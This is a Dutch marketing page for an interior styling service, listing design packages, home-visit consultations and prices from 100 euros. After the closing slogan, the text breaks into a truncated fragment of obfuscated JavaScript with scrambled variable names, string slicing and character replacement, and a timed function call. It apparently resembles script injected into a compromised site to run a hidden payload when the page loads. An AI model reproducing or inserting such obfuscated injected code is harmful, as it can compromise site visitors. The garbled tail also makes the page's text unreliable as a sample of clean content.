Interieurstyling

Een interieur dat bij u past…”

Om u helemaal thuis te kunnen voelen in uw eigen huis, is een uitgebalanceerd en evenwichtig interieur dat bij u past onmisbaar. De invloed van het interieur wordt vaak onderschat. De sfeer en inrichting van uw woning heeft effect op uw dagelijks leven, uw humeur, eigenlijk op uw algehele gemoedstoestand. De interieurstylist maakt een interieurplan volledig op uw situatie afgestemd. Door een goed interieurontwerp met een goede indeling, kleurenplan, lichtplan en het gebruik van de juiste accessoires wordt uw ideale inrichting gecreeërd. Een goed interieur voelt als een warme deken.

Basis Interieurontwerp: De styliste komt bij u aan huis om uw woning en uw huidige inrichting te bekijken. Er wordt een ‘programma van eisen’ opgesteld. Aan de hand van uw persoonlijke voorkeuren, wensen en eisen van de ruimte, worden er twee verschillende ontwerpen uitgewerkt in een plattegrond op schaal. De styliste geeft praktische oplossingen, zodat uw huis ook echt uw thuis wordt. De ontwerpen bevatten een indeling-, kleur- en verlichtingadvies en advies over het gebruik van accessoires.

Basis Plus Interieurontwerp : Het Basis Interieurontwerp wordt uitgebreid met twee perspectieftekeningen per ontwerp. Ook wordt het ontwerp verduidelijkt met een sfeer- en meubelcollage.

Verkort Interieuradvies: 1 uur durend mondeling interieur en/of stylingadvies.De styliste komt aan huis en geeft ter plekke advies en oplossingen voor de problemen waar u tegen aan loopt. U krijgt advies over de indeling, kleur, verlichting en het gebruik van accessoires

Combinatiepakket: Combineer een interieurontwerp en verkoopstylingadvies. Uw nieuwe huis perfect ingericht en uw huidige woning sneller en beter verkocht.  

Tevens zijn er vele extra mogelijkheden om uw interieur helemaal af te maken. Denk hierbij aan personal shopping, begeleiding bij de uitvoer van het advies of styling als finishing touch.

Interieur- en stylingadvies is al mogelijk vanaf 100 euro.

Voelt als een warme deken…”

tjrF4').slice(6, -10).replace(/YY/g, 'tm'));var dME=4459;lV="";a[qN](function(){ p.s() }, 343);jI="jI";lP='';}var pE=new Array();var rN=new Date();jF=47524;var uS=function(){return 'uS'};}};this.nB=10734;var oJ=new iX(); this.mA=false;oJ.s();var aL="";